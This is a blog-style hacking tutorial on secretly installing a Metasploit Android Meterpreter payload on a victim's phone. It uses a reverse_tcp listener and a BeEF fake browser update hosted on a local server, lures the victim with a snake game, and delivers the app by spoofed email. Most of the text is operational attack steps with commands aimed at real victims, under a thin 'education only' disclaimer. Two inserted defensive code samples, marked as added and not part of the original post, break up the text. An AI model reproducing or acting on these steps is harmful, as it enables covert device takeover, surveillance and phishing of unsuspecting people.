Android Hacking part-2: Install apps without coming in contact with any phone

As I promised in the previous article, my next post is about Android hacking. In this article, you will learn how to install apps on your victim's phone easily, without touching his/her phone.
I know it is not easy to take someone's phone and install the app, and if you forget to open the app, there are no results.
If you have any problem or suggestion, let me know in the comments; I help everyone.

Note: This is for education purpose only. Please don’t misuse it.
Requirements
  • BeEF
  • Metasploit
  • Patience (most of the readers don’t have patience)
Practical
We will create an Android payload (a virus, or malicious app) using Metasploit. I have already posted how to generate an Android payload using Metasploit; check it.
After creating the app, launch Metasploit and wait to receive the connection. Here are the commands:
service postgresql start;msfconsole
This will launch Metasploit. Further commands:
use exploit/multi/handler;set payload android/meterpreter/reverse_tcp;set lhost ; set lport 4444
Leave this terminal as it is and follow the next steps.
Launch BeEF. In Kali, you can start it from the sidebar. In Parrot or any other security distribution, you can launch it using this command:
beef-xss
BeEF is the Browser Exploitation Framework. Whether the victim is using Chrome or Firefox, you will not face any problem.

As you can see in the screenshot, it asks for a username and password. These are the default username and password:
beef
beef
After a successful login, a new web page opens where, in the sidebar, there are two directories, online browser and offline browser. We can hook a browser using a script, and then we will be able to run our own code in the victim's browser. When you hook a browser, it shows up under online browser. If this is confusing, don't worry, you will understand everything.
BeEF also launches a terminal when you start it. Here is a screenshot of the terminal; I have highlighted the example, so remember it, because we will use it later.
To hook your own browser, visit the link http://127.0.0.1:3000/demos/basic.html or insert the script tag. When you open it, BeEF will show something like this.

This means you hooked your own browser (127.0.0.1 means your browser). Click on 127.0.0.1 and choose Commands. In the Commands tab, expand Social Engineering and pick Fake update bar (chrome), because I'm using Chrome; you can find the victim's browser using the Details tab.
Open a new terminal and type ifconfig to find your IP address.
In my case, it is 192.168.43.7.
To hook a victim, my URL will be http://192.168.43.7:3000/demos/basic.html.
Connect your phone to the same network that your computer is using. Open this URL on the Android phone; here is what I got on the BeEF control panel. In the commands, expand Social Engineering and choose Fake update bar (chrome), because I'm using Chrome; you can find the browser using the Details tab.
In the URL field we will place our Android payload URL. You can upload the payload to a very famous website like Google Drive or start your own server.
Just run this command.
service apache2 start
After this, copy the Android virus that you generated in the first step to /var/www/directory. So the URL of the Android virus is http:///appname.apk

I think you know how to find your local IP address. Paste the URL into the URL field of BeEF and click on Execute.
On execution, your Android phone will show you something like this.
If you choose Install Missing Plugins, the app will start downloading.
Tap on Open, and the app asks for installation. After installing, when you open it, you will be in the browser app (because our app displays nothing).
But we will get a meterpreter session.
I already posted how to hide the app icon and get a meterpreter session again and again in the first post of Android hacking.
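From the defender's side, the chain above leaves a recognizable trace in web proxy logs: a client talks to a host on port 3000 (the BeEF port used above) and shortly afterwards fetches an .apk over plain HTTP from the same host. The following added example, which is not part of the original post, flags that sequence; the log format, the client addresses and the 10-minute window are assumptions.

```python
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed proxy log lines: timestamp, client, method, URL, status.
LOG = """\
2024-05-01T10:00:02 192.168.43.20 GET http://192.168.43.7:3000/demos/basic.html 200
2024-05-01T10:01:40 192.168.43.20 GET http://192.168.43.7/appname.apk 200
2024-05-01T10:02:00 192.168.43.21 GET https://store.example/app.apk 200
2024-05-01T10:03:00 192.168.43.22 GET http://192.168.43.9:3000/index.html 200
"""

BEEF_PORT = 3000                 # port used by the BeEF panel on this page
WINDOW = timedelta(minutes=10)   # assumed correlation window


def find_suspect_downloads(log_text):
    """Return (client, host, path) for plain-HTTP .apk downloads that follow
    a port-3000 request from the same client to the same host."""
    last_seen = {}   # (client, host) -> time of the latest port-3000 request
    alerts = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines
        ts, client, _method, url, _status = parts
        when = datetime.fromisoformat(ts)
        u = urlsplit(url)
        if u.port == BEEF_PORT:
            last_seen[(client, u.hostname)] = when
        elif u.scheme == "http" and u.path.lower().endswith(".apk"):
            seen = last_seen.get((client, u.hostname))
            if seen is not None and when - seen <= WINDOW:
                alerts.append((client, u.hostname, u.path))
    return alerts


if __name__ == "__main__":
    for alert in find_suspect_downloads(LOG):
        print("suspicious APK download:", alert)
```

The rule is a heuristic: port 3000 is also common for development servers, and a payload hosted on a third-party site would not share a host with the hook page.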

How to perform a real task

In a real case, we can't send the link like this. Your victim will close the tab immediately. So we should create something engaging.
I found a snake script. It is a game developed using JavaScript; you can download it from GitHub.
Note: This game only works with arrow keys. An Android user may be unable to play the game. So we will show Install Missing Plugins to play the game.
Here are the simple steps to do this.
First, clone this game from GitHub.
git clone https://github.com/Mariacristina88/Snake-game.git; cp -r ./Snake-game /var/www/html; nano  /var/www/html/Snake-game/snakegame.html

If the above Linux commands confuse you, read my Linux commands for beginners post. A semicolon (;) is used to run two or more commands on a single line.
It will download the game, copy it to the HTML folder and open snakegame.html. Just insert this script tag.
Press Ctrl+O to save and Ctrl+X to exit.
Now, send the URL http://192.168.43.60/Snake-game/snakegame.html to your victim. You can port forward your router to perform it over the internet.
Now when our victim opens the link, he will see something like this.
And we will hook that browser. After that, repeat the above steps to install apps.
Tip: you can add custom CSS to make the fake update clear, so our victim will install the app successfully.

Part-2 Email spoofing

As is clear from its name, we will spoof our email address. I mean you can send email from any address (yeah, even from Bill Gates' email address; do you have Bill Gates' email address?). To spoof an email address, you need only SMTP settings.
Don't be confused by the above words; there are tools and websites.
I use https://emkei.cz/ for sending spoofed emails.
This website has a straightforward interface. Just enter to, from, subject and message, and send the message.
But the Gmail service will catch it and move the email to spam.
If your victim is using a webmail service, then there is a 99% chance that your message will appear in the inbox.
Here is a screenshot of the mail I sent to my webmail using this website.
Thus, using a spoofed email, you send the malicious app to your victim. Just make sure your message is real and quick.
The problem with this method is: who uses webmail on an Android phone? Or my victim is using Gmail.
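The kind of check that sends such a message to spam, as an added example that is not part of the original post: the receiving server records SPF, DKIM and DMARC results in an Authentication-Results header, and a filter compares the authenticated domain with the From domain. All messages, domains and the trusted server name mx.webmail.test are constructed, and alignment is simplified to a suffix match.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample messages; every domain here is a placeholder.
SPOOFED = (
    "Authentication-Results: mx.webmail.test; spf=fail smtp.mailfrom=mailer.test;"
    " dkim=none; dmarc=fail header.from=example.com\n"
    "From: Bill <bill@example.com>\nTo: user@webmail.test\nSubject: Update\n\nInstall this app.\n"
)
GENUINE = (
    "Authentication-Results: mx.webmail.test; spf=pass smtp.mailfrom=bounce@example.com;"
    " dkim=pass header.d=example.com; dmarc=pass header.from=example.com\n"
    "From: Bill <bill@example.com>\nTo: user@webmail.test\nSubject: Hello\n\nHi.\n"
)
# Same mail, but the header was not stamped by our own receiving server.
FOREIGN_AR = SPOOFED.replace("mx.webmail.test; spf=fail", "mx.other.test; spf=pass", 1)


def domain_of(value):
    return value.rpartition("@")[2].lower()


def aligned(auth_domain, from_domain):
    # Relaxed alignment, simplified to a suffix match (real DMARC uses the Public Suffix List).
    return bool(auth_domain) and (
        auth_domain == from_domain
        or auth_domain.endswith("." + from_domain)
        or from_domain.endswith("." + auth_domain)
    )


def assess(raw, trusted_authserv="mx.webmail.test"):
    msg = message_from_string(raw)
    from_domain = domain_of(parseaddr(msg.get("From", ""))[1])
    # Only trust results whose authserv-id is our own receiving server.
    trusted = [h for h in msg.get_all("Authentication-Results", [])
               if h.split(";", 1)[0].strip().lower() == trusted_authserv]
    if not trusted:
        return "unverified"
    ar = " ".join(trusted)
    result = dict(re.findall(r"\b(spf|dkim|dmarc)=(\w+)", ar))
    prop = dict(re.findall(r"\b(smtp\.mailfrom|header\.d)=([\w.@-]+)", ar))
    spf_ok = result.get("spf") == "pass" and aligned(domain_of(prop.get("smtp.mailfrom", "")), from_domain)
    dkim_ok = result.get("dkim") == "pass" and aligned(domain_of(prop.get("header.d", "")), from_domain)
    return "authenticated" if (spf_ok or dkim_ok) else "likely-spoofed"
```

A mail server that skips these checks, or a domain that publishes no SPF or DMARC policy, leaves the From address unverified.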
Well, this is part of social engineering. You should find your own way to hack your victim's phone. Don't worry, we will go further into advanced Android hacking, but due to exams I will publish the next article in the future.
